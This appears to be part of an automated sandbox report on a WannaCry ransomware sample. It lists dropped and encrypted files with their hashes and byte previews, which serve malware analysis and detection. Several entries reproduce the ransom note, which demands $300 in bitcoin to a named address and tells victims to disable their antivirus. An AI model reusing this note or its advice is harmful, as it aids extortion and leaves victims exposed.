                                SSDEEP:12:8HwpzYNbfMQMtUNgsJUoBjAuZoMEwJwU+GtwU+GlmCt:8L+Vcg0AuvE5nG2nGlm
                                MD5:D5ADA753FFB2696EFF2847209F1F5501
                                SHA1:6FF9F1D03DFB0A85CA9EB44E83E7C330AA1578AF
                                SHA-256:62BEC4FD603EFBB85E05335DF2F7EAB315E5A8310822901526F121B2FADC971C
                                SHA-512:7E6A028C69CF82986789CE9A4780B704220C9F7D0554B47FC329CA3A227380EBDEFB885635015F94C29917F071EEA462890E2CAE9A7E1322C4D673844672242C
                                Malicious:true
                                Reputation:unknown
                                Preview:L..................F.... ....{..5...{..5.......................................P.O. .:i.....+00.:...:..,.LB.)...A&...&.......`._.....Y.5....Y.5....t.2......J.. .@WANAD~1.EXE..X......?V..?V.......b........................@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.......Z...............-.......Y...........0-.......C:\Users\user\Desktop\@WanaDecryptor@.exe......\.@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.`.......X.......226533..............n4UB.. .|..o..,........P..#.....n4UB.. .|..o..,........P..#.E.......9...1SPS..mD..pH.H@..=x.....h....H......c-dSA....n.............

                                C:\ProgramData\Microsoft\Diagnosis\ScenariosSqlStore\EventStore.db.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):33048
                                Entropy (8bit):7.994733214312098
                                Encrypted:true
                                SSDEEP:768:ZxnZOCeDPAqdm41zfnAoAgUHUzJErTrloF/lDEJ+XJh6e:PQfDAF41z/ApgUyJErlGtEJWhF
                                MD5:5BFD7E020F0F0C275D100EBBCF19C37B
                                SHA1:502A5818AA3C36D1D8CB602990BECB3F27760DDF
                                SHA-256:C32DB725ABCF83AF19B2EE8FD166506760696675EB7ABBA5BF398E8711054073
                                SHA-512:EC15DEED1BB393F1D7FE42F293CE08F814662A73960A5CF1445BBB5A7895743F88CD351F85D471D8B8D356295DF8CFAC346F31CC27D51DAC6DD2E0D40B07FC47
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!.......D......y...=Y...E.(OY...$....}O......x....HgA.[|.N../......#....n{....xY...$&.^`..'8....25...E9 ..._.h....<.;..\4.......d...WJ.."....uo.D..5...@....Hn...I.....,".iX...B.{..l$.U-..E..7.R..5U..Va.J.Wj>kS.j.V....+JH..9.`t....;`eCY.~.l.../..*.QgL..............p...$.v.]u[.i.J.....}$..h./..k......9...c.s.K.{..{.,}...[..Z...t0F....H[.=.>1,..gIr?..HZ..>.........O..g..Q.buSPJ......$..>@..+...B..).X.5...u......I+..o@.."....W.B...u....\-.q!P5D[.......z.9.Z..xi2.R....w(O%Z...AQi..<qS..cg..W....Va...].I"..1....7:<.P<]._...".d....Z..:.$}m.b...o].A.......LJ...3..h.Il....s.7"@.*.P.k......|.<.#..(6......?..!r.%.|M2c:x.Ba..S{6.R..I4........'.....3D).++:.......Y.w7...e.;Q.......,(......2...(...wR........O...&D..[.pl.+.._"/.3r.......gb..X.S.....h0j..k....WR-.K....L..5..b.@,....>%.=...f...Nn.u...!....&...=...........C....}....{3#Cj.@....=.v....e..q..#PB...*..*.......|...hOM.,.*.zl.....6G0A..d.{]...H0..YA.2."....i.....9O......5<pC.5U..m.G....\{.

                                C:\ProgramData\Microsoft\Diagnosis\TenantStorage\P-ARIA\EventStore.db.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):24856
                                Entropy (8bit):7.993330742117823
                                Encrypted:true
                                SSDEEP:384:Mx6PQqMYis3eOloBbuwJe1xk27myHHrv7fBvczJmAS7Sn4x+5yfgC:1PubC/z6eXk26OLhpL7vfb
                                MD5:A77CC6D0E0F078E11E4F7CDCF884E345
                                SHA1:4D012AE1BAFF9699721888C793981A18D818F766
                                SHA-256:7ACC678F68C38A8D216773CC21EF0792840F0864130E8CACBD3E8769A6B701BC
                                SHA-512:DBB5B0E95D6277412FD3FADDC878BB2DFFDE0B2D890A179560A3FA70BF7D5F86553C7CDB7FB2C240D08BB2EF59DD07CE99B8DDD3650863E223E4CE194E588D16
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!....%...\3.B.k2...@...3'=...Mh.I(.....Do..!>...3U.i.0...Z"G(..g..-....~....C....h.3..B.!.......3..A:>.r....:.E..K...T...LgR_[v.S...Y. ...........g.;.......k.Sy."v..E[8.6(.......8bho..........^]..nN..:..Zqg.).{...r....-..Z...3g8U.\..A..\[.%.l........`......x(.<o.>...9y...,...m.\l1....@w...Y......Og.J.\M....5.aTZ..}.Xp......is.)...........}...I.Mq..A_...!.^V...."cd....E.3.-..,|....2.JH.....S...~Sh......v..m.p.[AQ.!i.-i.. z.Y.q.8.,.E.....%U..........!...y......>N....q.^.l..;.i.$L{......v.......>:.s.`2.up.vF....~a...k.....W....v..4.Q{..d.o.X.@...*.FhpxH*...3...@.|.....Yl....OJ..t...5U.a...WJ..E.9.#PO}...O....R.].....y.)..E..w.:V...XPbm.....wB.G1+,.@E[.j.'....#.\[C1...Q..4.+1....X...`.8.....`.....{.<......%..Z2~......-e.e..8....~_...5Zm...b...O..b.$.G.mE.....Cx6W.v.<......t...jR.@..>Wg...e:1..>..q.7.6(.N.J..:.....g.... ...C...g..q.....%0.....;...\...0.5O.#{2.aq9... ..[Z!...E..+...Z?[!=.'R...8....X"......X;......{8m.>o.D..J.

                                C:\ProgramData\Microsoft\Diagnosis\osver.txt.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):296
                                Entropy (8bit):7.18786193011106
                                Encrypted:false
                                SSDEEP:6:bkEKDmE9AvXqQ7s1wZUv+Ty8CJW9+hcBYONBSKU27W3dv3:bkEKDbiPqcbZUvwy8CI9+ar73D8dv3
                                MD5:B71CCEE6741DF21A33BD3875B1FEA990
                                SHA1:831DB70C27B39919D88599203D769E97A522BB70
                                SHA-256:6D10320FE47C39906FA90EF3A49C9AF56FB70E88EC05EBFC828EB74908B22CC5
                                SHA-512:9C85AFDF6A31AF4A24A15E6AC56DBE644D1A3EE35911CA41FC4F68B7B64D5092EF986E29ECDC47C0BCE07C5A5F9691E82AE6D5582A96706A72266B4D6D312DD0
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!....T`Dy|....${.....X.6.0u..fn....}.)..O.......R.AN.A]S.....s..#w.j..-.....I...g...C..MZ..U.-.UW.cx.S.F.+1O.. .'...n P....t...vG.......j.!'Lc....D.....n..R~.eX....e.......~<\...6......Y.4uM.....f..[N=...A?).E..W...%..Pw9....".UF.6..........:..8.................6.Y..l.1t...W

                                C:\ProgramData\Microsoft\Network\Downloader\@Please_Read_Me@.txt

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):933
                                Entropy (8bit):4.708686542546707
                                Encrypted:false
                                SSDEEP:24:ptrPzDVR5Gi3OzGm0EigS1xbnrRQhbrW8PNAi0eEprY+Ai75wRZcet:DZD36W3yhvWmMo+S
                                MD5:F97D2E6F8D820DBD3B66F21137DE4F09
                                SHA1:596799B75B5D60AA9CD45646F68E9C0BD06DF252
                                SHA-256:0E5ECE918132A2B1A190906E74BECB8E4CED36EEC9F9D1C70F5DA72AC4C6B92A
                                SHA-512:EFDA21D83464A6A32FDEEF93152FFD32A648130754FDD3635F7FF61CC1664F7FC050900F0F871B0DDD3A3846222BF62AB5DF8EED42610A76BE66FFF5F7B4C4C0
                                Malicious:false
                                Reputation:unknown
                                Preview:Q: What's wrong with my files?....A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted... If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely!.. Let's start decrypting!....Q: What do I do?....A: First, you need to pay service fees for the decryption... Please send $300 worth of bitcoin to this bitcoin address: 115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn.... Next, please find an application file named "@WanaDecryptor@.exe". It is the decrypt software... Run and follow the instructions! (You may need to disable your antivirus for a while.).. ..Q: How can I trust?....A: Don't worry about decryption... We will decrypt your files surely because nobody will trust us if we cheat users... ....* If you need our assistance, send a message by clicking <Contact Us> on the decryptor window....

                                C:\ProgramData\Microsoft\Network\Downloader\@WanaDecryptor@.exe.lnk

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Sat Dec 31 15:12:56 2022, mtime=Sat Dec 31 15:12:56 2022, atime=Fri May 12 01:22:56 2017, length=245760, window=hide
                                Category:dropped
                                Size (bytes):577
                                Entropy (8bit):5.168523111223376
                                Encrypted:false
                                SSDEEP:12:8HwpzYNbfMQMtUNgsJUoBjAuZoMEwJwU+GtwU+GlmCt:8L+Vcg0AuvE5nG2nGlm
                                MD5:D5ADA753FFB2696EFF2847209F1F5501
                                SHA1:6FF9F1D03DFB0A85CA9EB44E83E7C330AA1578AF
                                SHA-256:62BEC4FD603EFBB85E05335DF2F7EAB315E5A8310822901526F121B2FADC971C
                                SHA-512:7E6A028C69CF82986789CE9A4780B704220C9F7D0554B47FC329CA3A227380EBDEFB885635015F94C29917F071EEA462890E2CAE9A7E1322C4D673844672242C
                                Malicious:true
                                Reputation:unknown
                                Preview:L..................F.... ....{..5...{..5.......................................P.O. .:i.....+00.:...:..,.LB.)...A&...&.......`._.....Y.5....Y.5....t.2......J.. .@WANAD~1.EXE..X......?V..?V.......b........................@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.......Z...............-.......Y...........0-.......C:\Users\user\Desktop\@WanaDecryptor@.exe......\.@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.`.......X.......226533..............n4UB.. .|..o..,........P..#.....n4UB.. .|..o..,........P..#.E.......9...1SPS..mD..pH.H@..=x.....h....H......c-dSA....n.............

                                C:\ProgramData\Microsoft\Network\Downloader\qmgr.db.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1311000
                                Entropy (8bit):7.999870530538717
                                Encrypted:true
                                SSDEEP:24576:6fJUwahcBZ5/gu03f/N5DQi5g4cMb+auw6zWpO9n2+J2gaP4oadlY7tWZI:6R1aOvCfVWi2nM6KJVgaPIqJZ
                                MD5:5B2F4F46CBC059D167D434056A00659C
                                SHA1:D4E43DFE946943D283F98B493EC6EC4B384A0A9F
                                SHA-256:603ADB897C6BB31900AEC1921BA4E3504C8D78FE1886C65E793F7C8BA3904F89
                                SHA-512:410EC9FFD48FA97AA157AEBA7685742462C6755D08C8636F319A5FCBE5687306E22EF48454A8937BCC2B55EA9E3641885911DC0CF9E5199A0B4042B4F43AAF3A
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!.......a]....$.*..H.~....4d+....H.4c.)m.l..(......7.....`..C...i^q..UHV..,.d..5O..... ..u.:..v....L...........#:.].9j.qB.....8...p.j...0u...........p..G..B...."....J.H.l...(.h.T....!...o....U.T.1....u..nR.......r..f..$O.RNq..Y<o. z..K....7&<4.....p...............=4..t.".)....{.G...6.`......t...;...YDy..x!..rp7.}.."..R,.j.V...v....9....O.AU.#..g}..S..07A.R|.t.8...m.`b.-&..2..Lz.......L.L..^..!.h%"..;...x....}..1..Y%S.......N.`.!..A.....0D.$...........f...;.....F.Q......`....?>............4.~;..e.is4{......m.g7.H.-Jo.E..uip...E .N..9y%'.@.....W...c......H.n.6..Gj.(,.8.Vrp.)F%.H[.E.....%Q5z.>.IY..Y_.J.9v.p...[.....8.c."p..>!:zh..1..^.4rf.`e.....@.`:.V/@..8u..Xt...P?o.#...).....:ur.Q...bA...?....e.....Pr...{Lr..b.B?!.c......Px.1....h..)Y...Q......w(-.<........fn.Tu..qB:...TgY..'.an<.a<.%.`.w.....].._6...:.....R..C...>"2:...Ns3.....w7./.,...3.=..%...B..T4p..yjR..+........s.m.]._.O.6...,Z.(..I..?.....P.....Ww.k..2..4.e.*...=.{,&0.Rp.O.h*E....."

                                C:\ProgramData\Microsoft\Search\Data\Applications\Windows\Windows.edb.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):25166104
                                Entropy (8bit):7.999993157108892
                                Encrypted:true
                                SSDEEP:786432:+lKAwxehwG/s8dfrp6Ntuox/BH3yJErcx1d:+lKAwxeb6DXbXXQl
                                MD5:DA29D7ECB72B1F4E484805DC2BAAD5E3
                                SHA1:15BD719EC89BA6B2F9FAD4EC650D54CEEF94E7D0
                                SHA-256:7A47247815745913D789584F5176C936F183034927DAF0CCE3EBE940CB3CD4A2
                                SHA-512:38CF676181D6155AB0A4BDE7A40908288B8803C703ACD1C6E67475D77A0C8AEED7BB4D1F91B5AA1E811935046DAFBEAD2E1558749475F150F81A2344D053D27C
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!......i...D*.%....v...U...u...=.u.5..Y.d.`q.g..=...../.8.=.mj..(.3i.R.......SJZ....U...o..m....c4.H....t.=...+...q?! .."`;Hm..N...5.|......0...?..#Y..B.%.5.-|.-!...r2.A".Ko..lR.....p......v.j&..8$...Lk.....i...P..E.....]....[1.~..3..$:A.#.....`D...8............JrV..C.'D..k......D%......|.e.,I)...25..(.=+..k.......@...J.~.r...E.v.........`0.A.....'dfG.....&.;..F...N..{..1.r.._...?c.:mhT....O.....4.1.....;.....n.%.%..r&H...-8.b.MmF...u..Uq).F.Q..vF.K.#...@WP.AFb......*..+!9.N.6.F|..\.Y......r".,^..e.....q../..3.}#)F(\@...+.(.Gd...|5EPQw....y..R9.).... ....&{.:.=4.....3.v.c...!..jm.E.n.c...,.W....E...m..t.....xi_g....]..i.o....sw.@..?..l./....R..?...:.[...Y1...B...6.1#.QV.If;!3i...v.(....>B.t.h.'.E.%|.l..If.....m...C..ENlv..m.x.V~u..N-P!.e...1.p..!.1.s...d._7mt96tSkey."......0.._.>!.1.hYf...pl|i^Vc}pS..#.n...U".%R.N...]./..}......9.XC..'..a....5 nr....%...E..uFE.....^..Z?r..|......U./...*...?..JK....\d....I+.-*.O.......?6gBKW.<..ET;...1

                                C:\ProgramData\Microsoft\SmsRouter\MessageStore\@Please_Read_Me@.txt

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):933
                                Entropy (8bit):4.708686542546707
                                Encrypted:false
                                SSDEEP:24:ptrPzDVR5Gi3OzGm0EigS1xbnrRQhbrW8PNAi0eEprY+Ai75wRZcet:DZD36W3yhvWmMo+S
                                MD5:F97D2E6F8D820DBD3B66F21137DE4F09
                                SHA1:596799B75B5D60AA9CD45646F68E9C0BD06DF252
                                SHA-256:0E5ECE918132A2B1A190906E74BECB8E4CED36EEC9F9D1C70F5DA72AC4C6B92A
                                SHA-512:EFDA21D83464A6A32FDEEF93152FFD32A648130754FDD3635F7FF61CC1664F7FC050900F0F871B0DDD3A3846222BF62AB5DF8EED42610A76BE66FFF5F7B4C4C0
                                Malicious:false
                                Reputation:unknown
                                Preview:Q: What's wrong with my files?....A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted... If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely!.. Let's start decrypting!....Q: What do I do?....A: First, you need to pay service fees for the decryption... Please send $300 worth of bitcoin to this bitcoin address: 115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn.... Next, please find an application file named "@WanaDecryptor@.exe". It is the decrypt software... Run and follow the instructions! (You may need to disable your antivirus for a while.).. ..Q: How can I trust?....A: Don't worry about decryption... We will decrypt your files surely because nobody will trust us if we cheat users... ....* If you need our assistance, send a message by clicking <Contact Us> on the decryptor window....

                                C:\ProgramData\Microsoft\SmsRouter\MessageStore\@WanaDecryptor@.exe.lnk

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Sat Dec 31 15:12:56 2022, mtime=Sat Dec 31 15:12:56 2022, atime=Fri May 12 01:22:56 2017, length=245760, window=hide
                                Category:dropped
                                Size (bytes):577
                                Entropy (8bit):5.168523111223376
                                Encrypted:false
                                SSDEEP:12:8HwpzYNbfMQMtUNgsJUoBjAuZoMEwJwU+GtwU+GlmCt:8L+Vcg0AuvE5nG2nGlm
                                MD5:D5ADA753FFB2696EFF2847209F1F5501
                                SHA1:6FF9F1D03DFB0A85CA9EB44E83E7C330AA1578AF
                                SHA-256:62BEC4FD603EFBB85E05335DF2F7EAB315E5A8310822901526F121B2FADC971C
                                SHA-512:7E6A028C69CF82986789CE9A4780B704220C9F7D0554B47FC329CA3A227380EBDEFB885635015F94C29917F071EEA462890E2CAE9A7E1322C4D673844672242C
                                Malicious:true
                                Reputation:unknown
                                Preview:L..................F.... ....{..5...{..5.......................................P.O. .:i.....+00.:...:..,.LB.)...A&...&.......`._.....Y.5....Y.5....t.2......J.. .@WANAD~1.EXE..X......?V..?V.......b........................@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.......Z...............-.......Y...........0-.......C:\Users\user\Desktop\@WanaDecryptor@.exe......\.@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.`.......X.......226533..............n4UB.. .|..o..,........P..#.....n4UB.. .|..o..,........P..#.E.......9...1SPS..mD..pH.H@..=x.....h....H......c-dSA....n.............

                                C:\ProgramData\Microsoft\SmsRouter\MessageStore\SmsInterceptStore.db.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):196888
                                Entropy (8bit):7.999311918909105
                                Encrypted:true
                                SSDEEP:6144:is7Em1JOX8FY7W1r0P2OQ16QlzlTd6muPnk:t7hEXNS1r0PRy6MzlpsPk
                                MD5:25B44E5390DF91FD20765F5B3534E8E4
                                SHA1:AD46AD97963D5F109E09BAA2E6D858BA81AD6C11
                                SHA-256:5DFD0C18B6AB1526491756E359ECE55E61D8E885E7139F8702C4CDB6CD878BB8
                                SHA-512:4D7772DBBB6FEA217065937347545E8D1B89064D77C505D01DE4D75D72C8C64226C9A6C3DDDC80C077EEBEC0718736F97BB318FDE7C75C1E4BD4B6AFB18C9862
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!......4...?5../<.6..EU........5..5...(.....6V.E.3...%...}. ....'./..3G...q.|m0...hXG.;z.T#.:S8U.Hx....e..m$C.jb..G.E).......flF....'.....}.>:)...!.l|.U-...a..W..?......s.G...Y.r.I.d.q".V.r.?...,~...T....ey.<.l.'........a[..}.a,Ix...q..>._./w..................x.$.*!..b8i(.x.i.Q.*. .. ...A.}.....'l.;|..L.7..#.+*...^..B.6.cK...7q....$.|....e-..M.0.J.....S....+Y:.5W..,%.< ....l....|.V....5.......V.T.6....9..$.'8..0h2..N...Vo. ...H9.}UDJ.7.I.U..........|..T.B....'.g........Ht.!...@.E.}...+mv.4".E....b.....FHL.....4H.+._..H.....$........R4g.fU9.:d#o.0.6gl):t...s...l.!.[..6.b..H...r\....U..Hk.o.....k..x3.}z'y..e...[.v.\...x.-..D;;._@S.S.B6...v......,.j..N..[F3..>/]`Z.8_...w.1hm...r/@..?..X..2,./...;O..6...LQ.C.Ve.#h..T....e.Z`O.|b.)8.d...#/....?T.......n..l..._...W{usx@.....MkJ.p.u.8.3+.c.w.2...d.D.T\..-$.\..S...<9...%-.w....wI.N{...*.&C...Y.....1U<6506?....].....e.H..f....p8..}V...Y.>`..Q....Y...p..*./....O.Y.}A._......5.k.FIe.

                                C:\ProgramData\Microsoft\UEV\Scripts\@Please_Read_Me@.txt

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):933
                                Entropy (8bit):4.708686542546707
                                Encrypted:false
                                SSDEEP:24:ptrPzDVR5Gi3OzGm0EigS1xbnrRQhbrW8PNAi0eEprY+Ai75wRZcet:DZD36W3yhvWmMo+S
                                MD5:F97D2E6F8D820DBD3B66F21137DE4F09
                                SHA1:596799B75B5D60AA9CD45646F68E9C0BD06DF252
                                SHA-256:0E5ECE918132A2B1A190906E74BECB8E4CED36EEC9F9D1C70F5DA72AC4C6B92A
                                SHA-512:EFDA21D83464A6A32FDEEF93152FFD32A648130754FDD3635F7FF61CC1664F7FC050900F0F871B0DDD3A3846222BF62AB5DF8EED42610A76BE66FFF5F7B4C4C0
                                Malicious:false
                                Reputation:unknown
                                Preview:Q: What's wrong with my files?....A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted... If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely!.. Let's start decrypting!....Q: What do I do?....A: First, you need to pay service fees for the decryption... Please send $300 worth of bitcoin to this bitcoin address: 115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn.... Next, please find an application file named "@WanaDecryptor@.exe". It is the decrypt software... Run and follow the instructions! (You may need to disable your antivirus for a while.).. ..Q: How can I trust?....A: Don't worry about decryption... We will decrypt your files surely because nobody will trust us if we cheat users... ....* If you need our assistance, send a message by clicking <Contact Us> on the decryptor window....

                                C:\ProgramData\Microsoft\UEV\Scripts\@WanaDecryptor@.exe.lnk

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Sat Dec 31 15:12:56 2022, mtime=Sat Dec 31 15:12:56 2022, atime=Fri May 12 01:22:56 2017, length=245760, window=hide
                                Category:dropped
                                Size (bytes):577
                                Entropy (8bit):5.168523111223376
                                Encrypted:false
                                SSDEEP:12:8HwpzYNbfMQMtUNgsJUoBjAuZoMEwJwU+GtwU+GlmCt:8L+Vcg0AuvE5nG2nGlm
                                MD5:D5ADA753FFB2696EFF2847209F1F5501
                                SHA1:6FF9F1D03DFB0A85CA9EB44E83E7C330AA1578AF
                                SHA-256:62BEC4FD603EFBB85E05335DF2F7EAB315E5A8310822901526F121B2FADC971C
                                SHA-512:7E6A028C69CF82986789CE9A4780B704220C9F7D0554B47FC329CA3A227380EBDEFB885635015F94C29917F071EEA462890E2CAE9A7E1322C4D673844672242C
                                Malicious:true
                                Reputation:unknown
                                Preview:L..................F.... ....{..5...{..5.......................................P.O. .:i.....+00.:...:..,.LB.)...A&...&.......`._.....Y.5....Y.5....t.2......J.. .@WANAD~1.EXE..X......?V..?V.......b........................@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.......Z...............-.......Y...........0-.......C:\Users\user\Desktop\@WanaDecryptor@.exe......\.@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.`.......X.......226533..............n4UB.. .|..o..,........P..#.....n4UB.. .|..o..,........P..#.E.......9...1SPS..mD..pH.H@..=x.....h....H......c-dSA....n.............

                                C:\ProgramData\Microsoft\UEV\Scripts\RegisterInboxTemplates.ps1.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):904
                                Entropy (8bit):7.768206859833943
                                Encrypted:false
                                SSDEEP:24:bkQfmj83tD16G/7e+WiLcqOAHBgUXAeeLVlQP:bkbj4TnjWIcqNh7FeLVGP
                                MD5:DEF595274AB7D0B41B2A30C6355915A3
                                SHA1:AB5A8DFBC8947B71A9E8E7A4B71AF8BD7A7916A4
                                SHA-256:2D9D3DD244DCBE7870392B1DEC06AD25321FB9960D6394873720DF40BCD26456
                                SHA-512:6DC4677E6590A848EB5C470A0621A3ADAAFFD12718A9C012565B167FC428D02AA766A93B21BAFCE9EB92FD47F56B137788C6F532B3EA79BC3FC77CC6530B6230
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!.....VE.ZH.Cy.x.Q%f.N(.^...k.r'.E.B........Ir.....~......4m.....>.K.^...q)..:..N......yK...$...........Z....K=.L.Oe...Z!.S..b.8}..D3....m.vj7M...#/lb...........fL..u{.s,..?.*`c.1^.M....1u....#*=..54|...Z.:..ol.I.........\.>.[......\xXb...U.%...........c..........i..=.b.3..IoN)...P.\JB.T.../m(.~i.:...$.y.Z........~..(E.=_....j.....:....<...K.....j...gj.mB.J'..,.}[;.,p.}4<0w~.g...!6..u1~.(#Y.......g.C.3.....{...u...z....u?......<..=.4pUy...9...83.....fEMf..Y..V*[|s....N..f.jQ.=.3=.~.'...U-C......."F<%.v....j.......4....NV-V..lvz.g...g...!..^....W....G...M$.b....|uyp.......H.P{....$.....4F\.NJ..!....a.cz..-....:.1.J<.%...M.G............8....8T,'.p6..e...H2{..k....L..o%.....t....F~.\C`.]..j.[.5}..A....K.......*5.u..^.-.R.."W...=...6{..:..y.J.^.?4..g~........K....e./.}.U.w;.......;.d.PI..g@..6..N1..`....I#. .^D?n.""....?.'k.r....\F.R2'.7?M.

                                C:\ProgramData\Microsoft\User Account Pictures\@Please_Read_Me@.txt

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):933
                                Entropy (8bit):4.708686542546707
                                Encrypted:false
                                SSDEEP:24:ptrPzDVR5Gi3OzGm0EigS1xbnrRQhbrW8PNAi0eEprY+Ai75wRZcet:DZD36W3yhvWmMo+S
                                MD5:F97D2E6F8D820DBD3B66F21137DE4F09
                                SHA1:596799B75B5D60AA9CD45646F68E9C0BD06DF252
                                SHA-256:0E5ECE918132A2B1A190906E74BECB8E4CED36EEC9F9D1C70F5DA72AC4C6B92A
                                SHA-512:EFDA21D83464A6A32FDEEF93152FFD32A648130754FDD3635F7FF61CC1664F7FC050900F0F871B0DDD3A3846222BF62AB5DF8EED42610A76BE66FFF5F7B4C4C0
                                Malicious:false
                                Reputation:unknown
                                Preview:Q: What's wrong with my files?....A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted... If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely!.. Let's start decrypting!....Q: What do I do?....A: First, you need to pay service fees for the decryption... Please send $300 worth of bitcoin to this bitcoin address: 115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn.... Next, please find an application file named "@WanaDecryptor@.exe". It is the decrypt software... Run and follow the instructions! (You may need to disable your antivirus for a while.).. ..Q: How can I trust?....A: Don't worry about decryption... We will decrypt your files surely because nobody will trust us if we cheat users... ....* If you need our assistance, send a message by clicking <Contact Us> on the decryptor window....

                                C:\ProgramData\Microsoft\User Account Pictures\@WanaDecryptor@.exe.lnk

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Sat Dec 31 15:12:56 2022, mtime=Sat Dec 31 15:12:56 2022, atime=Fri May 12 01:22:56 2017, length=245760, window=hide
                                Category:dropped
                                Size (bytes):577
                                Entropy (8bit):5.168523111223376
                                Encrypted:false
                                SSDEEP:12:8HwpzYNbfMQMtUNgsJUoBjAuZoMEwJwU+GtwU+GlmCt:8L+Vcg0AuvE5nG2nGlm
                                MD5:D5ADA753FFB2696EFF2847209F1F5501
                                SHA1:6FF9F1D03DFB0A85CA9EB44E83E7C330AA1578AF
                                SHA-256:62BEC4FD603EFBB85E05335DF2F7EAB315E5A8310822901526F121B2FADC971C
                                SHA-512:7E6A028C69CF82986789CE9A4780B704220C9F7D0554B47FC329CA3A227380EBDEFB885635015F94C29917F071EEA462890E2CAE9A7E1322C4D673844672242C
                                Malicious:true
                                Reputation:unknown
                                Preview:L..................F.... ....{..5...{..5.......................................P.O. .:i.....+00.:...:..,.LB.)...A&...&.......`._.....Y.5....Y.5....t.2......J.. .@WANAD~1.EXE..X......?V..?V.......b........................@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.......Z...............-.......Y...........0-.......C:\Users\user\Desktop\@WanaDecryptor@.exe......\.@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.`.......X.......226533..............n4UB.. .|..o..,........P..#.....n4UB.. .|..o..,........P..#.E.......9...1SPS..mD..pH.H@..=x.....h....H......c-dSA....n.............

                                C:\ProgramData\Microsoft\User Account Pictures\guest.bmp.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):602456
                                Entropy (8bit):7.999712878075342
                                Encrypted:true
                                SSDEEP:12288:1QAiHwGSfGGq/K8K4RPRXrAktO92Fc0R/ibJEZ6OyiPP1:1QHHwDfGGqSUxtjt6O3P9
                                MD5:079839C8DB70CAB086453E27B7860567
                                SHA1:294FA1F11AA5488694A0451E75071942815F10DB
                                SHA-256:503CECCE4BEA587336F7C1BE10B21B4D2DBE37AA6466E0A00E3BE947B9CC48C2
                                SHA-512:A995A1E7A8F06B11AA34C0AA9ABC4012A228DC42067C99F87E24C3A462AD48A37E68EE351E56880010EB40BFA099D1B7963127D0796CC30B0353E1ED2E5C5773
                                Malicious:true
                                Reputation:unknown
